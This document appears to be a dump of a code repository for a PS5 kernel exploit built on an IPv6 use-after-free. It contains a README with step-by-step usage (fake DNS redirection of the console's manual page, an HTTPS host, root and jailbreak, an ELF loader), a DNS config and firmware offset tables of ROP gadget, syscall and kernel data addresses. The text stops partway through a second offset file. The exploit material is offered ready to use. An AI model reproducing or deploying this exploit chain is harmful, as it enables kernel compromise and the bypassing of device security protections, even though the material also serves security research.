├── .gitignore
├── README.md
├── dns.conf
├── document
└── en
│ └── ps5
│ ├── exploit.js
│ ├── index.html
│ ├── int64.js
│ ├── offsets
│ ├── 3.00.js
│ ├── 3.10.js
│ ├── 3.20.js
│ ├── 3.21.js
│ ├── 4.00.js
│ ├── 4.02.js
│ ├── 4.03.js
│ ├── 4.50.js
│ └── 4.51.js
│ ├── rop.js
│ ├── rop_slave.js
│ └── webkit.js
├── dumpserver.py
├── fakedns.py
├── host.py
├── klogclient.py
├── localhost.pem
├── logserver.py
├── rpcserver.py
└── sendelf.py
/.gitignore:
--------------------------------------------------------------------------------
1 | *.bin
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # PS5 3.xx / 4.xx Kernel Exploit
2 | ---
3 | ## Summary
4 | This repo contains an experimental WebKit ROP implementation of a PS5 kernel exploit based on **TheFlow's IPV6 Use-After-Free (UAF)**, which was [reported on HackerOne](https://hackerone.com/reports/1441103). The exploit strategy is for the most part based on TheFlow's BSD/PS4 PoC with some changes to accommodate the annoying PS5 memory layout (for more see *Research Notes* section). It establishes an arbitrary read / (semi-arbitrary) write primitive. This exploit and its capabilities have a lot of limitations, and as such, it's mostly intended for developers to play with to reverse engineer some parts of the system.
5 |
6 | With latest stability improvements, reliability is at about 80%. This document will contain research info about the PS5, and this exploit will undergo continued development and improvements as time goes on.
7 |
8 | Those interested in contributing to PS5 research/dev can join a discord I have setup [here](https://discord.gg/kbrzGuH3F6).
9 |
10 | Exploit should now support the following firmwares:
11 |
12 | - 3.00
13 | - 3.10
14 | - 3.20
15 | - 3.21
16 | - 4.00
17 | - 4.02
18 | - 4.03
19 | - 4.50
20 | - 4.51
21 |
22 |
23 |
24 |
25 | ## Currently Included
26 |
27 | - Obtains arbitrary read/write and can run a basic RPC server for reads/writes (or a dump server for large reads) (must edit your own address/port into the exploit file on lines 673-677)
28 | - Enables debug settings menu (note: you will have to fully exit settings and go back in to see it).
29 | - Gets root privileges
30 |
31 |
32 |
33 |
34 | ## Limitations
35 | - This exploit achieves read/write, **but not code execution**. This is because we cannot currently dump kernel code for gadgets, as kernel .text pages are marked as eXecute Only Memory (XOM). Attempting to read kernel .text pointers will panic!
36 | - As per the above + the hypervisor (HV) enforcing kernel write protection, this exploit also **cannot install any patches or hooks into kernel space**, which means no homebrew-related code for the time being.
37 | - Clang-based fine-grained Control Flow Integrity (CFI) is present and enforced.
38 | - Supervisor Mode Access Prevention/Execution (SMAP/SMEP) cannot be disabled, due to the HV.
39 | - The write primitive is somewhat constrained, as bytes 0x10-0x14 must be zero (or a valid network interface).
40 | - Though due to newer work using pipes, full arbitrary read/write is now possible
41 |
42 |
43 |
44 |
45 | ## How to use
46 |
47 | 1. Configure fakedns via `dns.conf` to point `manuals.playstation.net` to your PCs IP address
48 | 2. Run fake dns: `python fakedns.py -c dns.conf`
49 | 3. Run HTTPS server: `python host.py`
50 | 4. Go into PS5 advanced network settings and set primary DNS to your PCs IP address and leave secondary at `0.0.0.0`
51 | 1. Sometimes the manual still won't load and a restart is needed, unsure why it's really weird
52 | 5. Go to user manual in settings and accept untrusted certificate prompt, run
53 | 6. Optional: Run rpc/dump server scripts (note: address/port must be substituted in binary form into exploit.js).
54 |
55 |
56 |
57 | ## Future work
58 | - [x] ~~Fix-up sockets to exit browser cleanly (top prio)~~
59 | - [x] ~~Write some data patches (second prio)~~
60 | - [x] ~~Enable debug settings~~
61 | - [x] ~~Patch creds for uid0~~
62 | - [x] ~~Jailbreak w/ cr_prison overwrite~~
63 | - [x] ~~Improve UAF reliability~~
64 | - [x] ~~Improve victim socket reliability (third prio)~~
65 | - [x] ~~Use a better / more consistent leak target than kqueue~~ (no longer necessary)
66 | - [x] Make ELF loader support relocations
67 | - [ ] Add support for more relocations and possibly full dynamic linkage?
68 |
69 |
70 |
71 |
72 | ## Using ELF Loader
73 |
74 | To use the ELF loader, run the exploit until completion. Upon completion it'll run a server on port `:9020`. Connect and send your ELF to the PS5 over that port and it'll run it. Assuming the ELF doesn't crash the browser, it can continue to run ELFs forever.
75 |
76 |
77 |
78 | ## Exploit Stages
79 | This exploit works in 5 stages, and for the most part follows the same exploit strategy as theflow's poc.
80 | 1) Trigger the initial UAF on `ip6_pktopts` and get two sockets to point to the same `pktopts` / overlap (master socket <-> overlap spray socket)
81 | 2) Free the `pktopts` on the master socket and fake it with an `ip6_rthdr` spray containing a tagged `tclass` overlap.
82 | 3) Infoleak step. Use `pktopts`/`rthdr` overlap to leak a kqueue from the 0x200 slab and `pktopts` from the 0x100 slab.
83 | 4) Arbitrary read/write step. Fake `pktopts` again and find the overlap socket to use `IPV6_RTHDR` as a read/write primitive.
84 | 4) Cleanup + patch step. Increase refcount on corrupted sockets for successful browser exit + patch data to enable debug menu and patch ucreds for uid0.
85 | 4) Run ELF loader server that will accept and load/run ELFs. Currently WIP, does not support relocations at the moment.
86 |
87 |
88 |
89 | ## Stability Notes
90 | Stability for this exploit is at about ~~30%~~ 80-90%, and has two potential points of failure. In order of observed descending liklihood:
91 | 1) *Stage 1* fails to reclaim the UAF, causing immediate crash or latent corruption that causes crash.
92 | 2) *Stage 4* fails to find a victim socket
93 |
94 |
95 |
96 | ## Research Notes
97 | - ~~It appears based on various testing and dumping with the read primitive, that the PS5 has reverted back to 0x1000 page size compared to the PS4's 0x4000.~~
98 | - After further research, the page size is indeed still 0x4000, however due to some insane allocator changes, different slabs can be allocated in the same virtual page.
99 |
100 | - It also seems on PS5 that adjacent pages rarely belong to the same slab, as you'll get vastly different data in adjacent pages. Memory layout seems more scattered.
101 | - Often when the PS5 panics (at least in webkit context), there will be awful audio output as the audio buffer gets corrupted in some way.
102 | - Sometimes this audio corruption persists to the next boot, unsure why.
103 | - Similar to PS4, the PS5 will require the power button to be manually pressed on the console twice to restart after a panic.
104 | - It is normal for the PS5 to take an absurd amount of time to reboot from a panic if it's isolated from the internet (unfortunately). Expect boot to take 3-4 minutes.
105 |
106 |
107 |
108 | ## Contributors / Special Thanks
109 | - [Andy Nguyen / theflow0](https://twitter.com/theflow0) - Vulnerability and exploit strategy
110 | - [ChendoChap](https://github.com/ChendoChap) - Various help with testing and research
111 | - [Znullptr](https://twitter.com/Znullptr) - Research/RE
112 | - [sleirsgoevy](https://twitter.com/sleirsgoevy) - Research/RE + exploit strat ideas
113 | - [bigboss](https://twitter.com/psxdev) - Research/RE
114 | - [flatz](https://twitter.com/flat_z) - Research/RE + help w/ patches
115 | - [zecoxao](https://twitter.com/notzecoxao) - Research/RE
116 | - [SocracticBliss](https://twitter.com/SocraticBliss) - Research/RE
117 | - laureeeeeee - Background low-level systems knowledge and assistance
118 |
119 |
120 |
121 | ## Thanks to testers
122 |
123 | - Dizz (4.50/4.51)
124 |
--------------------------------------------------------------------------------
/dns.conf:
--------------------------------------------------------------------------------
1 | A manuals.playstation.net 10.0.0.193
--------------------------------------------------------------------------------
/document/en/ps5/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | PS5 Kernel Exploit (3.xx-4.xx)
5 |
6 |
61 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
95 |
96 |
97 |
98 |
--------------------------------------------------------------------------------
/document/en/ps5/int64.js:
--------------------------------------------------------------------------------
1 | function int64(low, hi) {
2 | this.low = (low >>> 0);
3 | this.hi = (hi >>> 0);
4 |
5 | this.add32inplace = function (val) {
6 | let new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
7 | let new_hi = (this.hi >>> 0);
8 |
9 | if (new_lo < this.low) {
10 | new_hi++;
11 | }
12 |
13 | this.hi = new_hi;
14 | this.low = new_lo;
15 | }
16 |
17 | this.add32 = function (val) {
18 | let new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
19 | let new_hi = (this.hi >>> 0);
20 |
21 | if (new_lo < this.low) {
22 | new_hi++;
23 | }
24 |
25 | return new int64(new_lo, new_hi);
26 | }
27 |
28 | this.sub32 = function (val) {
29 | let new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
30 | let new_hi = (this.hi >>> 0);
31 |
32 | if (new_lo > (this.low) & 0xFFFFFFFF) {
33 | new_hi--;
34 | }
35 |
36 | return new int64(new_lo, new_hi);
37 | }
38 |
39 | this.sub32inplace = function (val) {
40 | let new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
41 | let new_hi = (this.hi >>> 0);
42 |
43 | if (new_lo > (this.low) & 0xFFFFFFFF) {
44 | new_hi--;
45 | }
46 |
47 | this.hi = new_hi;
48 | this.low = new_lo;
49 | }
50 |
51 | this.and32 = function (val) {
52 | let new_lo = this.low & val;
53 | let new_hi = this.hi;
54 | return new int64(new_lo, new_hi);
55 | }
56 |
57 | this.and64 = function (vallo, valhi) {
58 | let new_lo = this.low & vallo;
59 | let new_hi = this.hi & valhi;
60 | return new int64(new_lo, new_hi);
61 | }
62 |
63 | this.toString = function () {
64 | let lo_str = (this.low >>> 0).toString(16);
65 | let hi_str = (this.hi >>> 0).toString(16);
66 |
67 | if (this.hi == 0)
68 | return lo_str;
69 | else
70 | lo_str = zeroFill(lo_str, 8)
71 |
72 | return hi_str + lo_str;
73 | }
74 |
75 | return this;
76 | }
77 |
78 | function zeroFill(number, width) {
79 | width -= number.toString().length;
80 |
81 | if (width > 0) {
82 | return new Array(width + (/\./.test(number) ? 2 : 1)).join('0') + number;
83 | }
84 |
85 | return number + ""; // always return a string
86 | }
--------------------------------------------------------------------------------
/document/en/ps5/offsets/3.00.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00314880;
2 | const OFFSET_wk_memset_import = 0x028DDEB8;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028DDB98;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x0002CED0;
7 | const OFFSET_lk_pthread_join = 0x0002F460;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x00014B50;
12 | const OFFSET_lc_setjmp = 0x0005F940;
13 | const OFFSET_lc_longjmp = 0x0005F990;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00107342,
20 | "pop rsi": 0x00115923,
21 | "pop rdx": 0x002FFDF2,
22 | "pop rcx": 0x0009AC92,
23 | "pop r8": 0x0024A59F,
24 | "pop r9" : 0x00277B41,
25 | "pop rax": 0x0002C827,
26 | "pop rsp": 0x00099A22,
27 |
28 | "mov [rdi], rsi": 0x00A2D5B8,
29 | "mov [rdi], rax": 0x0003A79A,
30 | "mov [rdi], eax": 0x0003A79B,
31 |
32 | "infloop": 0x00007351,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00E4EEDB,
36 | "sete al" : 0x00022549,
37 | "seta al" : 0x0000C94F,
38 | "setb al" : 0x0015E348,
39 | "setg al" : 0x002F89AA,
40 | "setl al" : 0x000E0D91,
41 | "shl rax, 3" : 0x01A26823,
42 | "add rax, rdx" : 0x016D53B2,
43 | "mov rax, [rax]" : 0x00047FEC,
44 | "inc dword [rax]": 0x004971AA,
45 | };
46 |
47 | let syscall_map = {
48 | 0x001: 0x33B80, // sys_exit
49 | 0x002: 0x34B30, // sys_fork
50 | 0x003: 0x32D50, // sys_read
51 | 0x004: 0x32CB0, // sys_write
52 | 0x005: 0x33350, // sys_open
53 | 0x006: 0x33980, // sys_close
54 | 0x007: 0x32570, // sys_wait4
55 | 0x00A: 0x34670, // sys_unlink
56 | 0x00C: 0x34000, // sys_chdir
57 | 0x00F: 0x33A00, // sys_chmod
58 | 0x014: 0x32ED0, // sys_getpid
59 | 0x017: 0x329D0, // sys_setuid
60 | 0x018: 0x33FE0, // sys_getuid
61 | 0x019: 0x33390, // sys_geteuid
62 | 0x01B: 0x33430, // sys_recvmsg
63 | 0x01C: 0x33660, // sys_sendmsg
64 | 0x01D: 0x341B0, // sys_recvfrom
65 | 0x01E: 0x328D0, // sys_accept
66 | 0x01F: 0x326F0, // sys_getpeername
67 | 0x020: 0x34810, // sys_getsockname
68 | 0x021: 0x34330, // sys_access
69 | 0x022: 0x344B0, // sys_chflags
70 | 0x023: 0x33E80, // sys_fchflags
71 | 0x024: 0x34D60, // sys_sync
72 | 0x025: 0x33330, // sys_kill
73 | 0x027: 0x32DD0, // sys_getppid
74 | 0x029: 0x34390, // sys_dup
75 | 0x02A: 0x32D20, // sys_pipe
76 | 0x02B: 0x349D0, // sys_getegid
77 | 0x02C: 0x34D20, // sys_profil
78 | 0x02F: 0x32870, // sys_getgid
79 | 0x031: 0x32850, // sys_getlogin
80 | 0x032: 0x340E0, // sys_setlogin
81 | 0x035: 0x32A90, // sys_sigaltstack
82 | 0x036: 0x32BF0, // sys_ioctl
83 | 0x037: 0x33EC0, // sys_reboot
84 | 0x038: 0x33DC0, // sys_revoke
85 | 0x03B: 0x340C0, // sys_execve
86 | 0x041: 0x33A60, // sys_msync
87 | 0x049: 0x33250, // sys_munmap
88 | 0x04A: 0x33FC0, // sys_mprotect
89 | 0x04B: 0x33140, // sys_madvise
90 | 0x04E: 0x33310, // sys_mincore
91 | 0x04F: 0x327D0, // sys_getgroups
92 | 0x050: 0x32D70, // sys_setgroups
93 | 0x053: 0x327B0, // sys_setitimer
94 | 0x056: 0x325D0, // sys_getitimer
95 | 0x059: 0x33E20, // sys_getdtablesize
96 | 0x05A: 0x34230, // sys_dup2
97 | 0x05C: 0x33860, // sys_fcntl
98 | 0x05D: 0x333B0, // sys_select
99 | 0x05F: 0x32810, // sys_fsync
100 | 0x060: 0x33740, // sys_setpriority
101 | 0x061: 0x32F90, // sys_socket
102 | 0x062: 0x34020, // sys_connect
103 | 0x063: 0x34990, // sys_netcontrol
104 | 0x064: 0x32590, // sys_getpriority
105 | 0x065: 0x345B0, // sys_netabort
106 | 0x066: 0x34930, // sys_netgetsockinfo
107 | 0x068: 0x34630, // sys_bind
108 | 0x069: 0x338A0, // sys_setsockopt
109 | 0x06A: 0x32B90, // sys_listen
110 | 0x071: 0x33BA0, // sys_socketex
111 | 0x072: 0x33570, // sys_socketclose
112 | 0x074: 0x34D40, // sys_gettimeofday
113 | 0x075: 0x34E20, // sys_getrusage
114 | 0x076: 0x32550, // sys_getsockopt
115 | 0x078: 0x337E0, // sys_readv
116 | 0x079: 0x33640, // sys_writev
117 | 0x07A: 0x34290, // sys_settimeofday
118 | 0x07C: 0x331D0, // sys_fchmod
119 | 0x07D: 0x33A40, // sys_netgetiflist
120 | 0x07E: 0x34910, // sys_setreuid
121 | 0x07F: 0x33530, // sys_setregid
122 | 0x080: 0x34490, // sys_rename
123 | 0x083: 0x334B0, // sys_flock
124 | 0x085: 0x34D80, // sys_sendto
125 | 0x086: 0x34BB0, // sys_shutdown
126 | 0x087: 0x33F40, // sys_socketpair
127 | 0x088: 0x33CE0, // sys_mkdir
128 | 0x089: 0x32F30, // sys_rmdir
129 | 0x08A: 0x32440, // sys_utimes
130 | 0x08C: 0x348D0, // sys_adjtime
131 | 0x08D: 0x33A20, // sys_kqueueex
132 | 0x093: 0x33C80, // sys_setsid
133 | 0x0A5: 0x32770, // sys_sysarch
134 | 0x0B6: 0x34710, // sys_setegid
135 | 0x0B7: 0x325B0, // sys_seteuid
136 | 0x0BC: 0x34770, // sys_stat
137 | 0x0BD: 0x34B70, // sys_fstat
138 | 0x0BE: 0x33550, // sys_lstat
139 | 0x0BF: 0x32C50, // sys_pathconf
140 | 0x0C0: 0x33F00, // sys_fpathconf
141 | 0x0C2: 0x33490, // sys_getrlimit
142 | 0x0C3: 0x33070, // sys_setrlimit
143 | 0x0C4: 0x34690, // sys_getdirentries
144 | 0x0CA: 0x34470, // sys___sysctl
145 | 0x0CB: 0x33B20, // sys_mlock
146 | 0x0CC: 0x34510, // sys_munlock
147 | 0x0CE: 0x32FD0, // sys_futimes
148 | 0x0D1: 0x335B0, // sys_poll
149 | 0x0E8: 0x32670, // sys_clock_gettime
150 | 0x0E9: 0x33AE0, // sys_clock_settime
151 | 0x0EA: 0x34AE0, // sys_clock_getres
152 | 0x0EB: 0x346B0, // sys_ktimer_create
153 | 0x0EC: 0x32E30, // sys_ktimer_delete
154 | 0x0ED: 0x34B90, // sys_ktimer_settime
155 | 0x0EE: 0x34040, // sys_ktimer_gettime
156 | 0x0EF: 0x331F0, // sys_ktimer_getoverrun
157 | 0x0F0: 0x34570, // sys_nanosleep
158 | 0x0F1: 0x33DA0, // sys_ffclock_getcounter
159 | 0x0F2: 0x32D90, // sys_ffclock_setestimate
160 | 0x0F3: 0x33C20, // sys_ffclock_getestimate
161 | 0x0F7: 0x34610, // sys_clock_getcpuclockid2
162 | 0x0FD: 0x341D0, // sys_issetugid
163 | 0x110: 0x34970, // sys_getdents
164 | 0x121: 0x34080, // sys_preadv
165 | 0x122: 0x335D0, // sys_pwritev
166 | 0x136: 0x332D0, // sys_getsid
167 | 0x13B: 0x34790, // sys_aio_suspend
168 | 0x144: 0x32E50, // sys_mlockall
169 | 0x145: 0x34250, // sys_munlockall
170 | 0x147: 0x32F50, // sys_sched_setparam
171 | 0x148: 0x33BC0, // sys_sched_getparam
172 | 0x149: 0x32710, // sys_sched_setscheduler
173 | 0x14A: 0x33590, // sys_sched_getscheduler
174 | 0x14B: 0x333F0, // sys_sched_yield
175 | 0x14C: 0x32990, // sys_sched_get_priority_max
176 | 0x14D: 0x32AB0, // sys_sched_get_priority_min
177 | 0x14E: 0x32CE0, // sys_sched_rr_get_interval
178 | 0x154: 0x324A0, // sys_sigprocmask
179 | 0x155: 0x324E0, // sys_sigsuspend
180 | 0x157: 0x343B0, // sys_sigpending
181 | 0x159: 0x344D0, // sys_sigtimedwait
182 | 0x15A: 0x34110, // sys_sigwaitinfo
183 | 0x16A: 0x346F0, // sys_kqueue
184 | 0x16B: 0x32950, // sys_kevent
185 | 0x17B: 0x328F0, // sys_mtypeprotect
186 | 0x188: 0x32A10, // sys_uuidgen
187 | 0x189: 0x34E60, // sys_sendfile
188 | 0x18D: 0x32EB0, // sys_fstatfs
189 | 0x190: 0x32A70, // sys_ksem_close
190 | 0x191: 0x33800, // sys_ksem_post
191 | 0x192: 0x340A0, // sys_ksem_wait
192 | 0x193: 0x34E40, // sys_ksem_trywait
193 | 0x194: 0x32BB0, // sys_ksem_init
194 | 0x195: 0x345D0, // sys_ksem_open
195 | 0x196: 0x342B0, // sys_ksem_unlink
196 | 0x197: 0x32A30, // sys_ksem_getvalue
197 | 0x198: 0x34270, // sys_ksem_destroy
198 | 0x1A0: 0x34750, // sys_sigaction
199 | 0x1A1: 0x343F0, // sys_sigreturn
200 | 0x1A5: 0x330D0, // sys_getcontext
201 | 0x1A6: 0x33E00, // sys_setcontext
202 | 0x1A7: 0x33F20, // sys_swapcontext
203 | 0x1AD: 0x33120, // sys_sigwait
204 | 0x1AE: 0x327F0, // sys_thr_create
205 | 0x1AF: 0x32B50, // sys_thr_exit
206 | 0x1B0: 0x334F0, // sys_thr_self
207 | 0x1B1: 0x32B70, // sys_thr_kill
208 | 0x1B9: 0x34190, // sys_ksem_timedwait
209 | 0x1BA: 0x324C0, // sys_thr_suspend
210 | 0x1BB: 0x32DF0, // sys_thr_wake
211 | 0x1BC: 0x33E60, // sys_kldunloadf
212 | 0x1C6: 0x34B50, // sys__umtx_op
213 | 0x1C7: 0x34890, // sys_thr_new
214 | 0x1C8: 0x347F0, // sys_sigqueue
215 | 0x1D0: 0x34150, // sys_thr_set_name
216 | 0x1D2: 0x33700, // sys_rtprio_thread
217 | 0x1DB: 0x32E90, // sys_pread
218 | 0x1DC: 0x33FA0, // sys_pwrite
219 | 0x1DD: 0x34870, // sys_mmap
220 | 0x1DE: 0x34370, // sys_lseek
221 | 0x1DF: 0x33410, // sys_truncate
222 | 0x1E0: 0x32E70, // sys_ftruncate
223 | 0x1E1: 0x32460, // sys_thr_kill2
224 | 0x1E2: 0x34DE0, // sys_shm_open
225 | 0x1E3: 0x34850, // sys_shm_unlink
226 | 0x1E6: 0x33090, // sys_cpuset_getid
227 | 0x1E7: 0x34C50, // sys_cpuset_getaffinity
228 | 0x1E8: 0x34410, // sys_cpuset_setaffinity
229 | 0x1F3: 0x32830, // sys_openat
230 | 0x203: 0x33EE0, // sys___cap_rights_get
231 | 0x20A: 0x33920, // sys_pselect
232 | 0x214: 0x339E0, // sys_regmgr_call
233 | 0x215: 0x33760, // sys_jitshm_create
234 | 0x216: 0x33D40, // sys_jitshm_alias
235 | 0x217: 0x32C30, // sys_dl_get_list
236 | 0x218: 0x33A80, // sys_dl_get_info
237 | 0x21A: 0x339C0, // sys_evf_create
238 | 0x21B: 0x32E10, // sys_evf_delete
239 | 0x21C: 0x33D60, // sys_evf_open
240 | 0x21D: 0x33940, // sys_evf_close
241 | 0x21E: 0x33C00, // sys_evf_wait
242 | 0x21F: 0x343D0, // sys_evf_trywait
243 | 0x220: 0x33D80, // sys_evf_set
244 | 0x221: 0x342F0, // sys_evf_clear
245 | 0x222: 0x33100, // sys_evf_cancel
246 | 0x223: 0x33BE0, // sys_query_memory_protection
247 | 0x224: 0x334D0, // sys_batch_map
248 | 0x225: 0x336E0, // sys_osem_create
249 | 0x226: 0x326B0, // sys_osem_delete
250 | 0x227: 0x32630, // sys_osem_open
251 | 0x228: 0x34C30, // sys_osem_close
252 | 0x229: 0x33CC0, // sys_osem_wait
253 | 0x22A: 0x342D0, // sys_osem_trywait
254 | 0x22B: 0x33F60, // sys_osem_post
255 | 0x22C: 0x33840, // sys_osem_cancel
256 | 0x22D: 0x335F0, // sys_namedobj_create
257 | 0x22E: 0x332F0, // sys_namedobj_delete
258 | 0x22F: 0x34EC0, // sys_set_vm_container
259 | 0x230: 0x32DB0, // sys_debug_init
260 | 0x233: 0x33720, // sys_opmc_enable
261 | 0x234: 0x32790, // sys_opmc_disable
262 | 0x235: 0x337A0, // sys_opmc_set_ctl
263 | 0x236: 0x337C0, // sys_opmc_set_ctr
264 | 0x237: 0x34210, // sys_opmc_get_ctr
265 | 0x23C: 0x33030, // sys_virtual_query
266 | 0x249: 0x34650, // sys_is_in_sandbox
267 | 0x24A: 0x33210, // sys_dmem_container
268 | 0x24B: 0x33AC0, // sys_get_authinfo
269 | 0x24C: 0x32610, // sys_mname
270 | 0x24F: 0x32C10, // sys_dynlib_dlsym
271 | 0x250: 0x32F10, // sys_dynlib_get_list
272 | 0x251: 0x349B0, // sys_dynlib_get_info
273 | 0x252: 0x338C0, // sys_dynlib_load_prx
274 | 0x253: 0x328B0, // sys_dynlib_unload_prx
275 | 0x254: 0x34730, // sys_dynlib_do_copy_relocations
276 | 0x256: 0x336C0, // sys_dynlib_get_proc_param
277 | 0x257: 0x34A10, // sys_dynlib_process_needed_and_relocate
278 | 0x258: 0x32480, // sys_sandbox_path
279 | 0x259: 0x32FF0, // sys_mdbg_service
280 | 0x25A: 0x33680, // sys_randomized_path
281 | 0x25B: 0x344F0, // sys_rdup
282 | 0x25C: 0x32AF0, // sys_dl_get_metadata
283 | 0x25D: 0x33230, // sys_workaround8849
284 | 0x25E: 0x329F0, // sys_is_development_mode
285 | 0x25F: 0x33B60, // sys_get_self_auth_info
286 | 0x260: 0x34E00, // sys_dynlib_get_info_ex
287 | 0x262: 0x34EA0, // sys_budget_get_ptype
288 | 0x263: 0x32D00, // sys_get_paging_stats_of_all_threads
289 | 0x264: 0x34C10, // sys_get_proc_type_info
290 | 0x265: 0x32420, // sys_get_resident_count
291 | 0x267: 0x33780, // sys_get_resident_fmem_count
292 | 0x268: 0x34830, // sys_thr_get_name
293 | 0x269: 0x33E40, // sys_set_gpo
294 | 0x26A: 0x33B40, // sys_get_paging_stats_of_all_objects
295 | 0x26B: 0x32930, // sys_test_debug_rwmem
296 | 0x26C: 0x32A50, // sys_free_stack
297 | 0x26E: 0x32650, // sys_ipmimgr_call
298 | 0x26F: 0x33AA0, // sys_get_gpo
299 | 0x270: 0x34E80, // sys_get_vm_map_timestamp
300 | 0x271: 0x34430, // sys_opmc_set_hw
301 | 0x272: 0x32F70, // sys_opmc_get_hw
302 | 0x273: 0x325F0, // sys_get_cpu_usage_all
303 | 0x274: 0x33C60, // sys_mmap_dmem
304 | 0x275: 0x33010, // sys_physhm_open
305 | 0x276: 0x33820, // sys_physhm_unlink
306 | 0x278: 0x34DC0, // sys_thr_suspend_ucontext
307 | 0x279: 0x332B0, // sys_thr_resume_ucontext
308 | 0x27A: 0x33270, // sys_thr_get_ucontext
309 | 0x27B: 0x33370, // sys_thr_set_ucontext
310 | 0x27C: 0x32FB0, // sys_set_timezone_info
311 | 0x27D: 0x33D00, // sys_set_phys_fmem_limit
312 | 0x27E: 0x330B0, // sys_utc_to_localtime
313 | 0x27F: 0x34EE0, // sys_localtime_to_utc
314 | 0x280: 0x34060, // sys_set_uevt
315 | 0x281: 0x32BD0, // sys_get_cpu_usage_proc
316 | 0x282: 0x33450, // sys_get_map_statistics
317 | 0x283: 0x341F0, // sys_set_chicken_switches
318 | 0x286: 0x34B10, // sys_get_kernel_mem_statistics
319 | 0x287: 0x33D20, // sys_get_sdk_compiled_version
320 | 0x288: 0x32690, // sys_app_state_change
321 | 0x289: 0x348B0, // sys_dynlib_get_obj_member
322 | 0x28C: 0x32730, // sys_process_terminate
323 | 0x28D: 0x32EF0, // sys_blockpool_open
324 | 0x28E: 0x32C90, // sys_blockpool_map
325 | 0x28F: 0x346D0, // sys_blockpool_unmap
326 | 0x290: 0x34310, // sys_dynlib_get_info_for_libdbg
327 | 0x291: 0x333D0, // sys_blockpool_batch
328 | 0x292: 0x32B30, // sys_fdatasync
329 | 0x293: 0x33050, // sys_dynlib_get_list2
330 | 0x294: 0x34DA0, // sys_dynlib_get_info2
331 | 0x295: 0x34550, // sys_aio_submit
332 | 0x296: 0x32AD0, // sys_aio_multi_delete
333 | 0x297: 0x33900, // sys_aio_multi_wait
334 | 0x298: 0x329B0, // sys_aio_multi_poll
335 | 0x299: 0x34450, // sys_aio_get_data
336 | 0x29A: 0x338E0, // sys_aio_multi_cancel
337 | 0x29B: 0x32890, // sys_get_bio_usage_all
338 | 0x29C: 0x33F80, // sys_aio_create
339 | 0x29D: 0x349F0, // sys_aio_submit_cmd
340 | 0x29E: 0x348F0, // sys_aio_init
341 | 0x29F: 0x34350, // sys_get_page_table_stats
342 | 0x2A0: 0x347B0, // sys_dynlib_get_list_for_libdbg
343 | 0x2A1: 0x34950, // sys_blockpool_move
344 | 0x2A2: 0x347D0, // sys_virtual_query_all
345 | 0x2A3: 0x33880, // sys_reserve_2mb_page
346 | 0x2A4: 0x34130, // sys_cpumode_yield
347 | 0x2A5: 0x33C40, // sys_wait6
348 | 0x2A6: 0x336A0, // sys_cap_rights_limit
349 | 0x2A7: 0x32C70, // sys_cap_ioctls_limit
350 | 0x2A8: 0x339A0, // sys_cap_ioctls_get
351 | 0x2A9: 0x34170, // sys_cap_fcntls_limit
352 | 0x2AA: 0x32910, // sys_cap_fcntls_get
353 | 0x2AB: 0x34C70, // sys_bindat
354 | 0x2AC: 0x33470, // sys_connectat
355 | 0x2AD: 0x326D0, // sys_chflagsat
356 | 0x2AE: 0x32520, // sys_accept4
357 | 0x2AF: 0x32B10, // sys_pipe2
358 | 0x2B0: 0x33510, // sys_aio_mlock
359 | 0x2B1: 0x34BF0, // sys_procctl
360 | 0x2B2: 0x33EA0, // sys_ppoll
361 | 0x2B3: 0x33DE0, // sys_futimens
362 | 0x2B4: 0x34590, // sys_utimensat
363 | 0x2B5: 0x33B00, // sys_numa_getaffinity
364 | 0x2B6: 0x33960, // sys_numa_setaffinity
365 | 0x2C1: 0x32970, // sys_get_phys_page_size
366 | 0x2C9: 0x34BD0, // sys_get_ppr_sdk_compiled_version
367 | 0x2CC: 0x331B0, // sys_openintr
368 | 0x2CD: 0x33CA0, // sys_dl_get_info_2
369 | 0x2CE: 0x33290, // sys_acinfo_add
370 | 0x2CF: 0x32500, // sys_acinfo_delete
371 | 0x2D0: 0x34530, // sys_acinfo_get_all_for_coredump
372 | 0x2D1: 0x345F0, // sys_ampr_ctrl_debug
373 | 0x2D2: 0x32750, // sys_workspace_ctrl
374 | };
375 |
376 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x7301;
377 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x317301;
378 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xEE7301;
379 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x276DC58;
380 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6466474;
381 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x646647D;
382 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6466498;
383 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6466500;
384 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1CC2670;
385 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x67AB4C0;
386 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/3.10.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00314880;
2 | const OFFSET_wk_memset_import = 0x028DDEB8;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028DDB98;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x0002CED0;
7 | const OFFSET_lk_pthread_join = 0x0002F460;
